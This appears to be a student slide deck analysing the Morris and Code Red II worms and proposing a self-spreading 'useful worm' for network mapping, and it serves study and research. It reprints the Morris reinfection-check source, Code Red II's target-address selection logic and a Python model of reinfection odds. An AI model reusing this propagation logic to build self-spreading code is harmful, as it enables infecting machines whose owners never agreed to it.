Post on 20-Dec-2015
The Worm Works For You
Matt Weaver
CS591
Introduction
The Shockwave Rider
PARC
Town Crier
Vampire
Goal
Use a worm to measure bandwidth and map a network.
Analyze classic worms: Morris, Code Red.
Determine the algorithm and architecture of a “useful worm”
Morris Mistake
Listen on a port: a failed check leads to infection. Machines were reinfected.
Morris

checkother()   /* 0x57d0 */
{
    int s, l8, l12, l16, optval;
    struct sockaddr_in sin;   /* 16 bytes */

    optval = 1;
    if ((random() % 7) == 3)
        return;   /* 612 */
    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s < 0)
        return;

    /* Make a socket to the localhost, using a link-time specific port */
    bzero(&sin, sizeof(sin));   /* 16 */
    sin.sin_family = AF_INET;
    sin.sin_addr.s_addr = inet_addr(XS("127.0.0.1"));   /* <other_fd+4> */
    sin.sin_port = 0x00005b3d;   /* ??? */

    if (connect(s, &sin, sizeof(sin)) < 0) {
        close(s);
    } else {
        l8 = MAGIC_2;   /* Magic number??? */
        if (write(s, &l8, sizeof(l8)) != sizeof(l8)) {
            close(s);
            return;
        }
        l8 = 0;
        if (xread(s, &l8, sizeof(l8), 5*60) != sizeof(l8)) {
            close(s);
            return;
        }
        if (l8 != MAGIC_1) {
            close(s);
            return;
        }
        l12 = random()/8;
        if (write(s, &l12, sizeof(l12)) != sizeof(l12)) {
            close(s);
            return;
        }
        if (xread(s, &l16, sizeof(l16), 10) != sizeof(l16)) {
            close(s);
            return;
        }
        if (!((l12+l16) % 2))
            pleasequit++;
        close(s);
    }

    sleep(5);
    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s < 0)
        return;
    /* Set the socket so that the address may be reused */
    setsockopt(s, SOL_SOCKET, SO_REUSEADDR, &optval, sizeof(optval));
    if (bind(s, &sin, sizeof(sin)) < 0) {
        close(s);
        return;
    }
    listen(s, 10);
    other_fd = s;
    return;
}
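A model of the decision checkother() makes for a freshly started copy, added here as an example; it is not part of the slides or of the worm source. Function names are assumptions, and pleasequit is treated as an immediate exit, which the real worm only acted on later.

```python
import random

SKIP_ONE_IN = 7   # `if ((random() % 7) == 3) return;` skips the check entirely


def newcomer_stays(roll, listener_present, l12, l16):
    """Decision of a newly started copy, following checkother() step by step.

    roll             -- value of random() % 7 in the first test
    listener_present -- whether an older copy answers on the local port
    l12, l16         -- the random numbers the two copies exchange
    Returns True if the new copy keeps running on this host.
    """
    if roll == 3:
        # 1 in 7: no check at all, the copy simply stays (and never listens)
        return True
    if not listener_present:
        # connect() failed: the host is assumed clean, the copy stays and listens
        return True
    # An older copy answered. Parity of the exchanged numbers decides:
    # even sum -> `pleasequit++` in the newcomer, odd sum -> the newcomer stays.
    return (l12 + l16) % 2 != 0


def expected_stay_fraction():
    """Probability that a copy arriving on an already infected host stays."""
    p_skip = 1 / SKIP_ONE_IN
    return p_skip + (1 - p_skip) * 0.5      # 1/7 + 6/7 * 1/2 = 4/7


def stay_rate(arrivals, seed=1):
    """Monte Carlo: fraction of arrivals that stay when a listener is present.

    Each arrival draws its own random() values (constructed here with a
    seeded generator) and applies newcomer_stays() as the worm would."""
    rng = random.Random(seed)
    stayed = 0
    for _ in range(arrivals):
        roll = rng.randrange(SKIP_ONE_IN)
        l12, l16 = rng.randrange(1 << 30), rng.randrange(1 << 30)
        if newcomer_stays(roll, True, l12, l16):
            stayed += 1
    return stayed / arrivals


if __name__ == "__main__":
    print(f"expected fraction staying: {expected_stay_fraction():.3f}")
    print(f"simulated fraction staying: {stay_rate(7000):.3f}")
```

Judged only from the newcomer's code above, more than half of the copies reaching an already infected host stay resident, which is why a single host accumulated many copies.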
Code Red II
Mountain Dew
Code Red utilized a clever distribution scheme: not just the random IP trick.
Code Red II (Continued)
mtable[] = {
    0xFFFFFFFF,   // go anywhere
    0xFFFFFF00,   // stay in class A
    0xFFFFFF00,   // stay in class A
    0xFFFFFF00,   // stay in class A
    0xFFFFFF00,   // stay in class A
    0xFFFF0000,   // stay in class B
    0xFFFF0000,   // stay in class B
    0xFFFF0000    // stay in class B
};

# start with a random number that will be our new IP address.
# I presume the random number generator is "random enough".
newip = random();

# zero the UPPER octets of the random IP, which means that the
# random number won't participate in the class A or class B
# address
mask = mtable[ random() & 0x7 ];   // locate a mask
newip &= mask;                     // throw away rightmost bits

# flip the mask around to operate on LOWER octets
mask = ~mask;                      // flip the mask around
myip = LOCAL_IP & mask;            // throw away leftmost bits

# newip contains the upper bits
# myip contains the lower bits
# join them:
newip |= myip;

if (newip starts with 127) try again   // localhost
if (newip starts with 224) try again   // multicast
if (newip matches LOCAL_IP) try again

Connect to "newip" and try to infect
A New Worm
[Diagram: a Root machine connected through the Network to several Target machines]
Logic
Write a text file (C on Win, ~ on Unix).
Talk to parent.
Find next machine.
Infect next.
Talk to parent.
Timed death.
Forced death (success).
[Diagram: Parent -> Child -> Next Target]
Concerns
Running amok / re-infection.
Termination.
The Root Machine
Compiles UDP payload information from child instances.
Maps network.
Dynamically generate viral payload (binary).
Provide control values.
Conclusion
Master’s Project: get it working safely.
Sources
Aleph One. “Smashing the Stack for Fun and Profit”. Phrack 49.
CERT. http://www.cert.org/
Eren, Sinan. “Smashing the Kernel Stack for Fun and Profit.” Phrack 60.
Erickson, Jon. Hacking: The Art of Exploitation. No Starch Press, 2003.
Morris, Robert. Morris Worm Source Code. http://www.foo.be/docs-free/morris-worm/worm/
Wikipedia. “Computer Worm”. http://en.wikipedia.org/wiki/Computer_worm
Friedl, Steve. Unix Wiz. http://www.unixwiz.net/